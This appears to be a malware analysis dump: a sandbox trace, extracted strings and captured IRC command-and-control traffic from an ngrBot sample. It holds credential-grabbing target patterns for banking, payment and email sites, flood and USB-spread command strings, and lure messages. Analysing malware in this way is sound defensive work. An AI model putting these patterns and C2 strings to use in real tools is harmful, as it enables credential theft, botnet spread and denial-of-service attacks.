LoadLibraryA(C:WINDOWSsystem32VB6FR.DLL)=0 7337452c GetVersionExA() 7337476c LoadLibraryA(OLEAUT32.DLL)=770e0000 772370b9 GetVersionExA() 7723711c GetCommandLineA() 7337476c LoadLibraryA(SXS.DLL)=77210000 774efa66 LoadLibraryA(oleaut32.dll)=770e0000 73376792 RegOpenKeyA (HKLMSOFTWAREMicrosoftVBAMonitors) 77daeff6 RegOpenKeyExA (HKLMSOFTWAREMicrosoftVBAMonitors) 770fc957 LoadLibraryA(C:WINDOWSsystem32kernel32.dll)=7c800000 7337a15b LoadLibraryA(kernel32.dll)=7c800000 406f1e LoadLibraryA(kernel32)=7c800000 7337a15b LoadLibraryA(kernel32)=7c800000 7337a15b LoadLibraryA(USER32)=7e390000 7345d09c CreateFileA(C:Documents and SettingsMes documents31upjmrlzz.exe) 7345d34f ReadFile() 406f1e LoadLibraryA(NTDLL)=7c910000 7c8165b3 WaitForSingleObject(74c,64) 7c8191f8 LoadLibraryA(advapi32.dll)=77da0000 7337a4c5 GetCurrentProcessId()=1176 7337bdfa RegOpenKeyExA (HKLMSoftwareMicrosoftWindows) 7337be1c RegOpenKeyExA (HTML Help) 7337be1c RegOpenKeyExA (Help) 7337c9ce WaitForSingleObject(7e4,ffffffff) 73373657 ExitProcess() ***** Injected Process Terminated ***** DirwatchData -------------------------------------------------- WatchDir Initilized OK Watching C:DOCUME~1LOCALS~1Temp Watching C:WINDOWS Watching C:Program Files Created: Modifed: Created: C:DOCUME~1zezakLOCALS~1TempJET49CB.tmp Created: C:DOCUME~1zezakLOCALS~1TempJET37.tmp Deteled: C:DOCUME~1zezakLOCALS~1TempJET37.tmp Deteled: C:DOCUME~1zezakLOCALS~1TempJET49CB.tmp File: 31upjmrlzz.exe Size: 116236 Bytes MD5: 9702091B21C1A48955A5268D07E31EF6 Packer: File not found C:iDEFENSESysAnalyzerpeid.exe File Properties: CompanyName FileDescription FileVersion InternalName LegalCopyright OriginalFilename ProductName ProductVersion Exploit Signatures: --------------------------------------------------------------------------- Scanning for 19 signatures Scan Complete: 312Kb in 0,032 seconds Urls -------------------------------------------------- http://%s/%s http://%s/ http:// RegKeys -------------------------------------------------- gdatasoftware. sunbeltsoftware. SoftwareMicrosoftWindowsCurrentVersionRun SoftwareMicrosoftWindowsCurrentVersionRun SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem .DEFAULTSoftwareMicrosoftWindowsCurrentVersionRun ExeRefs -------------------------------------------------- File: 31upjmrlzz_dmp.exe_ .exe %windir%system32cmd.exe &&%%windir%%explorer.exe %%cd%%%s %0x.exe Internet Exploreriexplore.exe pidgin.exe wlcomm.exe msnmsgr.exe msmsgs.exe opera.exe chrome.exe ieuser.exe iexplore.exe firefox.exe .ipconfig.exe verclsid.exe regedit.exe rundll32.exe cmd.exe regsvr32.exe .exe lol.exe winlogon.exe explorer.exe y%s%s.exe lsass.exe Raw Strings: -------------------------------------------------- File: 31upjmrlzz_dmp.exe_ MD5: 42157d0a769f0335830e4646c6a00338 Size: 319490 Ascii Strings: --------------------------------------------------------------------------- !This program cannot be run in DOS mode. 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PRIVMSG %255s JOIN %255s PRIVMSG JOIN %s:%d NtSetInformationProcess %s.%s%s %S%s%s HKCU HKLM %s.%S%S %S%S%S state_%s %s.%s (p='%S') pop3://%s:%s@%s:%d popgrab %s:%s@%s:%d anonymous ftp://%s:%s@%s:%d ftpgrab %s.%s ->> %s (%s : %s) %s.%s ->> %s : %s Directadmin WHCMS cPanel blog %s-%s-%s ffgrab iegrab %s.Blocked possible browser exploit pack call on URL '%s' %s.Blocked possible browser exploit pack call on URL '%S' webroot. fortinet. virusbuster.nprotect. gdatasoftware. virus. precisesecurity. lavasoft. emsisoft. onlinemalwarescanner. f-secure. bullguard. clamav. pandasecurity. sophos. malwarebytes. sunbeltsoftware. norton. norman. mcafee. symantec comodo. avast. avira. avg. bitdefender. eset. kaspersky. trendmicro. iseclab. virscan. garyshood. viruschief. jotti. threatexpert. novirusthanks. virustotal. login[password] login[username] *members*.iknowthatgirl*/members* IKnowThatGirl *youporn.*/login* YouPorn ** Brazzers clave numeroTarjeta *clave=* *bcointernacional*login* Bcointernacional *:2222/CMD_LOGIN* *whcms*dologin* *:2086/login* *:2083/login* *:2082/login* **user_login* Webnames **login* Dotster loginid ** Enom login.Pass login.User *login.Pass=* ** 1and1 token **Login* Moniker LoginPassword LoginUserName *LoginPassword=* **login* Namecheap loginname ** Godaddy Password EmailName *Password=* ** Alertpay **ogin* Netflix ** Thepiratebay **login* Torrentleech **/signin-do* Vip-file *pas=* **/signin-do* Sms4file ** Letitbit ** Whatcd ** Oron **login* Filesonic ** Speedyshare *pw=* **login* Uploaded **login* Uploading loginUserPassword loginUserName *loginUserPassword=* ** Fileserve ** Hotfile ** 4shared txtpass txtuser *txtpass=* ** Netload ** Freakshare login_pass *login_pass=* **login* Mediafire ** Sendspace *megaupload.*/*login* Megaupload *depositfiles.*/*/login* Depositfiles userid *signin.ebay*SignIn eBay **login.asp* OfficeBanking *secure.logmein.*/*logincheck* LogMeIn session[password] session[username_or_email] *password]=* * Twitter txtPassword txtEmail *&txtPassword=* *.moneybookers.*/* Moneybookers *runescape*/*weblogin* Runescape *dyndns*/account* DynDNS *&password=* *no-ip*/login* NoIP *steampowered*/login* Steam quick_password quick_username username *hackforums.*/member.php Hackforums email *facebook.*/login.php* Facebook **/*login* Yahoo passwd login *passwd=* **/*post.srf* Live TextfieldPassword TextfieldEmail *TextfieldPassword=* *gmx.*/*FormLogin* *Passwd=* Gmail FLN-Password FLN-UserName *FLN-Password=* *fastmail.*/mail/* Fastmail pass user *pass=* *bigstring.*/*index.php* BigString screenname **/login.psp* password loginId *password=* *aol.*/*login.psp* Passwd Email *service=youtube* *google.*/*ServiceLoginAuth* YouTube login_password login_email *login_password=* *paypal.*/webscr?cmd=_login-submit* PayPal %s / ?%d HTTP/1.1 Host: %s User-Agent: %s Keep-Alive: 300 Connection: keep-alive Content-Length: 42 POST Mozilla/4.0 Connection: Close X-a: b .PHYSICALDRIVE0 00100 SeShutdownPrivilege NtShutdownSystem This binary is invalid. Main reasons: - you stupid cracker - you stupid cracker... - you stupid cracker?! ngrBot Error shell32.dll http httpi usbi dnsapi.dll DnsFlushResolverCache http://%s/%s http://%s/ HTTP Host: POST /%1023s {%s|%s%s}%s n%s{%s|%s%s}%s <br> admin isadmin %s|%s|%s [DNS]: Redirecting "%s" to "%s" disabled enabled %s|%s [Logins]: Cleared %d logins #user #admin #new removing exiting reconnecting MOTD bsod disable POP3 -> FTP -> [d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s) dlds http:// rebooting [Login]: %s [DNS]: Blocked %d domain(s) - Redirected %d domain(s) [Speed]: Estimated upload speed %d KB/s SoftwareMicrosoftWindowsCurrentVersionRun ngrBot running IPC_Check shellopencommand= shellexplorecommand= icon=shell32.dll,7 useautoplay=1 action=Open folder to view files shellexecute= [autorun] .lnk %windir%system32cmd.exe &&%%windir%%explorer.exe %%cd%%%s /c "start %%cd%%RECYCLER%s RECYCLER .inf %s%s .%c: %s%s %sautorun.tmp %sautorun.inf %c: gdkWindowToplevelClass %0x.exe comment-text *bebo.*/c/home/ajax_post_lifestream_comment bebo Lifestream *bebo.*/c/profile/comment_post.json bebo Comment Message *bebo.*/mail/MailCompose.jsp* bebo Message *friendster.*/sendmessage.php* Friendster Message comment Friendster Comment shoutout *friendster.*/rpc.php Friendster Shoutout * vkontakte Message * vkontakte Wall message * vkontakte Chat text *twitter.*/*direct_messages/new* Twitter Message *twitter.*/*status*/update* Twitter Tweet status *facebook.*/ajax/*MessageComposerEndpoint.php* Facebook Message msg_text *facebook.*/ajax/chat/send.php* Facebook IM -_.!~*'() Content-Length: %s.%s hijacked! MSG %d %s %d MSG %d %1s SDG %d %d Reliability: From: Content-Length: %d X-MMS-IM-Format: SDG %d bmsn %s_0x%08X RegCreateKeyExW RegCreateKeyExA URLDownloadToFileW URLDownloadToFileA PR_Write DnsQuery_W DnsQuery_A InternetWriteFile HttpSendRequestW HttpSendRequestA GetAddrInfoW send CreateFileA MoveFileW MoveFileA DeleteFileW DeleteFileA CopyFileW CopyFileA NtQueryDirectoryFile NtEnumerateValueKey %08x OPEN DnsFree DnsQuery_A DNSAPI.dll FreeContextBuffer InitializeSecurityContextW FreeCredentialsHandle DeleteSecurityContext QueryContextAttributesW AcquireCredentialsHandleW EncryptMessage DecryptMessage InitializeSecurityContextA ApplyControlToken Secur32.dll SHGetSpecialFolderPathW SHGetFileInfoA ShellExecuteA SHELL32.dll InternetCloseHandle InternetReadFile InternetQueryDataAvailable HttpQueryInfoA InternetOpenUrlA InternetOpenA HttpQueryInfoW InternetQueryOptionW WININET .dll PathAppendW StrStrIA PathAppendA PathFindExtensionA SHLWAPI.dll WS2_32.dll memset wcsstr strstr wcsrchr ??3@YAXPAX@Z atoi sscanf _strcmpi printf _snprintf sprintf strncpy _memicmp _wcsnicmp _vsnprintf _stricmp strtok strchr _snwprintf ??2@YAPAXI@Z _strnicmp isxdigit memmove strncmp toupper strrchr vsprintf isalnum strncat MSVCRT.dll lstrcpyA MoveFileExA lstrcmpA WideCharToMultiByte MoveFileExW lstrcmpW ExitThread MultiByteToWideChar GetFileAttributesA SetFileAttributesW GetFileAttributesW LoadLibraryW CloseHandle SetFileTime CreateFileW GetFileTime GetSystemTimeAsFileTime WriteFile GetModuleHandleW GetLastError ReadFile GetTickCount HeapAlloc GetProcessHeap HeapFree lstrlenA Sleep WriteProcessMemory ReadProcessMemory InitializeCriticalSection LeaveCriticalSection EnterCriticalSection HeapReAlloc SetEvent ConnectNamedPipe CreateNamedPipeA CreateEventA DisconnectNamedPipe GetOverlappedResult WaitForMultipleObjects CreateFileA VirtualFreeEx VirtualAllocEx IsWow64Process CreateRemoteThread OpenProcess WaitForSingleObject ReleaseMutex MapViewOfFile OpenFileMappingA CreateFileMappingA InterlockedIncrement UnmapViewOfFile CreateMutexA GetVersionExA GetModuleFileNameW InterlockedCompareExchange CreateThread GetWindowsDirectoryW DeleteFileW GetTempFileNameW lstrcatW lstrcpynW DeleteFileA SetFileAttributesA lstrcpyW LocalFree LocalAlloc lstrcpynA SetFilePointer DeviceIoControl VirtualAlloc CreateProcessW ExitProcess lstrcatA GetVolumeInformationW GetLocaleInfoA FlushFileBuffers CopyFileW FindClose FindNextFileA FindFirstFileA SetCurrentDirectoryA LockFile GetFileSize CreateDirectoryA GetLogicalDriveStringsA OpenMutexA GetModuleFileNameA GetWindowsDirectoryA KERNEL32.dll MessageBoxA wvsprintfA wsprintfW DefWindowProcA DispatchMessageA TranslateMessage GetMessageA RegisterDeviceNotificationA CreateWindowExA RegisterClassExA USER32.dll CryptGetHashParam CryptDestroyHash CryptHashData CryptReleaseContext CryptCreateHash CryptAcquireContextA AdjustTokenPrivileges LookupPrivilegeValueA OpenProcessToken RegCloseKey RegSetValueExW RegCreateKeyExW RegNotifyChangeKeyValue RegSetValueExA RegOpenKeyExA ADVAPI32.dll CoCreateInstance CoInitialize ole32.dll n;^ Qkkbal i]Wb 9a&g MGiI wn>Jj #.zf +o*7 !!!!!!!! @@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"""""""""""""""" @@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@x ROCKR ROCKR ROCKR #ROCK ngrBot ELPERRO ] CUSTOMER FvLQ49IlzIyLjj6m msn.set http.set http.inj mdns stats speed logins slow ssyn stop F4XA gGWHXA 5hXA ZpXA ` WA f0WA u{A<WA [@WA PASS %s [.ShellClassInfo] CLSID={645FF040-5081-101B-9F08-00AA002F954E} USER %s 0 0 :%s NICK %s JOIN %s %s PART %s PRIVMSG %s :%s QUIT :%s PONG %s PING PRIVMSG [v="%s" c="%s" h="%s" p="%S"] [d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d [d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d [Slowloris]: Starting flood on "%s" for %d minute(s) [Slowloris]: Finished flood on "%s" [UDP]: Starting flood on "%s:%d" for %d second(s) [UDP]: Finished flood on "%s:%d" [SYN]: Starting flood on "%s:%d" for %d second(s) [SYN]: Finished flood on "%s:%d" [USB]: Infected %s [MSN]: Updated MSN spread message to "%s" [MSN]: Updated MSN spread inte rval to "%s" [HTTP]: Updated HTTP spread message to "%s" [HTTP]: Injected value is now %s. [HTTP]: Updated HTTP spread interval to "%s" [Visit]: Visited "%s" [DNS]: Blocked "%s" [usb="%d" msn="%d" http="%d" total="%d"] [ftp="%d" pop="%d" http="%d" total="%d"] [RSOCK4]: Started rsock4 on "%s:%d" [RSOCK4]: Stopped rsock4 [d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s) [d="%s"] Error downloading file [e="%d"] [d="%s"] Error writing download to "%S" [e="%d"] [d="%s" s="%d bytes"] Error creating process "%S" [e="%d"] [d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"] [d="%s"] Error getting temporary filename. [e="%d"] [d='%s"] Error getting application data path [e="%d"] [Visit]: Error visitng "%s" [FTP Login]: %s [POP3 Login]: %s [FTP Infect]: %s was iframed [HTTP Login]: %s [HTTP Traffic]: %s [Ruskill]: Detected File: "%s" [Ruskill]: Detected DNS: "%s" [Ruskill]: Detected Reg: "%s" [PDef+]: %s [DNS]: Blocked DNS "%s" [MSN]: %s [HTTP]: %s ftplog poplog ftpinfect httplogin httptraff ruskill rdns rreg httpspread .pipe%08x_ipc 0;0G0O0V0d0n0s0 1)13181Y1e1u1|1 2C2c2 3 363M3j3u3 6(6/686J6O6T6m6 7 7(7O7V7_7 7=8T88 9#9:9W9^9f9~9 98:R:[: ;U<e<j<p< <g=o= >*>N> ?%?/?6?A?P? 0<0E0L0S0c0i0t0{0 2!3-4d4n4s4 5(5:5?5D5a5x5 6 6J6a6 7&7.7>7I7N7f7 1#2_2 8"8Q8X8g8q8 9':;:Y: <'<1<H<X<x< =%=7=D=K=Z=w=}= >@>R>>m> ?1?<?B?j? 0g0g1 1"2Q2~2 203N3 424>4^4 8;9~9 :K:';A;_; <4<><T<^<h< =*=>=D=N=l=u= >#>)>8>>>O>Y>^>p>u> ?8?L?c?u? 0$1-1H1N1_1n1 313Y3k3 414l4 515B5P5u5 676V6_6f6v6 889Y9r9 :-:G: ;#;(;2;7;<;A;F;W; <5<?<^< <W=l=|= =d>o>{> ?/?U?`?p? 1P2T2X2 3?4a4h4 5A5H5|5 7U8]8f8}8 9'9-939q9 : :%:n: ;1;J;d; <%<3<<<B<i<v< =$=+=0===E=L=T=o=v= =6>E> ?%?4?? 0'0K0 s0x0}0 091M1g1t1 3[3q3 3*494 4-575w5~5 5B6L6 6(7I7]7z7 848_9m9w9 :+:1:7:D:Q:V:e:t: ; ;,;8;L;Q;V;n;s;x;}; ;5<B<]<w< =5===B=N=S=g=l= 5"6-6B6L6Q6c6u6 7 70767=7L7R7 94:{: '010 1.1F1^1 2(2>2P2b2t2 4K5f5 6=6K6Y6 7*7/7L7S7r7 8]8i8 9+9;9A9G9d9q9w9}9 9/:b:h: ;!;S;`;h;s; ;E<e<w< =.=<=A=F=L=R=k=u= >#>,>X> ?-??y? 42484T4`4f4 4X5]5|5 6-646D6Q6[6b6g6q6z6 9 9&9<9G9R9W99q9v9 9::G:M:b:j:z: ;.;6;;;B;H;S;c;k; <+<F<T<`< =3=E=Q= >3>T>k>z> ?Z?r?{? %0<0V0h0 141>1l1 3g3r3 34c4 5*585R5w5 6!6<6R6a6 7=7C7T7g7z7 8-9L9w9 9-:D:W: ;#;4;:;T;Z; <#<(<-<2<7<P<j<w< =)=.=K=[=`=}= >+>I>V>[>s>z> ?*?H?T?a?g?u? 0,0J0Z0g0l0v0 1%101=1C1I1W1s1y1 2'212<2J2_2 3"3@3P3V3 4)4J4h4x4 535Q5s5 6!6.656D6S6`6m6z6 7?7E7 7'8,818[8w8 8.9K9V9s9 :':,:D:T:Y:r: ;2;7;W;r;w;|; <$<5<<<F<N<b< =(=I=O=Z=r=|= >V>g>|> >#?h? 0-070D0x0 0@1G1 132D2Z2p2 3*343=3R3^3 3-434=4F5P5]5 536N6[6 637B7U7d7q7 818>8T8]8|8 9T9`9o9u9z9 :!:,:3:;:A:O:Y:f:l:r: ;(;3;9;?;Q;];c;i;{; <&<3<8<G<T<Z<`<n< <,=3=A=G=W=w=|= >@>E>> >W?`? 010C0H0M0a0f0k0 1 1$1<1M1U1 1-2O2z2 3I3Z3o3z3 4"4'4<4U4_4t4z4 575=5r5|5 6(6=6P6m6z6 7 767<7~7 8A8F8Y8c8j8 999C9 :%:,:3:=:F:e: ;+;=;D;X;];c;i;n; ;.<4<;<@<e<p<w< ="=*=0=;=F=O=Z=b=g=v={= =7>N>W>]> >&?7?~? 40;0A0Q0a0 2)2A2[2 2T3]3f5 6F6Y6t6 7I7Y7_7e7k7q7w7}7 8*808;8~8 9 9O9X9^9 9$:0:Q: :&;2;8;F; <"<2<=<Q<W<i< =$=*=4=:=E=K=S=e= >;>I> ?!?F?M?W? 1$1<1I1[1g1 2%2>2V2a2t2|2 373E3M3a3l3 3@4N4U4 5/565<5R5k5 666i6 7.7M7 8,818M8[8`8 8?9R9 :#:4:9:?:E:P:{: ;#;B;U;[;b;r; <!<o< =$=;=C=N=S=X=i=n=s=}= >">(>.>4>:>@>F>L>R>X>^>d>j>p>v>|> ?B?H?N?T?Z?`?f?l?r?x?~? 4 4$4(4,4044484<4@4D4H4L4P4T4X66`6h6l6p6t6x6|6 7D7L7X77`7d7h7l7p7t7 9(949@9L9X9d9p9|9 :$:0:<:H:T:`:l:x: ; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;;`;d;h; 4 4$4(4,4044484<4@4D4H4L4P4T4X44`4d4h4l4p4t4x4|4 5 5$5(5,5054585<5@5D5H5L5P5T5X55`5d5h5l5p5t5x5|5 6 6$6(6,6064686<6@6D6H6L6P6T6X66`6d6h6l6p6t6x6|6 7 7$7(7,7074787<7@7D7H7L7P7T7X77`7d7h7l7p7t7x7|7 8 8$8(8,8084888<8@8D8H8L8P8T8X88`8d8h8l8p8t8x8|8 8 9,989D9P99h9x9|9 : :(:,:0:8:<:@:X:`:d:h:l:p:x:|: ; ;$;(;,;0;8;<;@;D;H;P;T;X;;`;h;l;p;t;x; < <(<,<0<4<8<@<D<H<L<P<X<<`<d<h<p<t<|< =(=0=8=@=H=T==d=l= Unicode Strings: --------------------------------------------------------------------------- Ajjj jjjj jjjj jjjj $jjj Ajjj DBWIN .pipe kernel32.dll ntdll.dll Internet Exploreriexplore.exe autorun.inf pidgin.exe wlcomm.exe msnmsgr.exe msmsgs.exe flock.ex opera.exe chrome.exe ieuser.exe iexplore.exe firefox.exe HKCU HKLM Microsoft Unified Security Protocol Provider .ipconfig.exe verclsid.exe regedit.exe rundll32.exe cmd.exe regsvr32.exe l"%s" %S POST .exe lol.exe n127.0.0.1 %s:Zone.Identifier wininet.dll secur32.dll ws2_32.dll :%S%SDesktop.ini winlogon.exe explorer.exe Aadvapi32.dll urlmon.dll nspr4.dll dnsapi.dll Akernel23.dll y%s%s.exe lsass.exe Shell SoftwareMicrosoftWindowsCurrentVersionRun SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem .DEFAULTSoftwareMicrosoftWindowsCurrentVersionRun
we have 2 new domains here not active yet active this is old domain allready posted in my blog
Resolved : [] To [] 5236 PASS ROCKR Botnet server here 5236 PASS ROCKR Botnet server here
PRIVMSG #rockspread :[HTTP]: Updated HTTP spread message to “mira este videito de jlo desnuda pufff mamacita |”
PRIVMSG #rockspread :[MSN]: Updated MSN spread message to “mira este videito de jlo desnuda pufff mamacita”
PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) – Redirected 16 domain(s)
PRIVMSG #ROCK :[d=”” s=”116236 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataWcxaxw.exe” – Download retries: 0
NICK n{US|XPa}eovvenu
USER eovvenu 0 0 :eovvenu
JOIN #rockspread
PRIVMSG #rockspread :[HTTP]: Updated HTTP spread interval to “4”
PRIVMSG #rockspread :[MSN]: Updated MSN spread interval to “4”
Now talking in #ROCK
Topic On: [ #ROCK ] [ ,up 9702091B21C1A48955A5268D07E31EF6 | ,mdns ]
Topic By: [ rockstar ]
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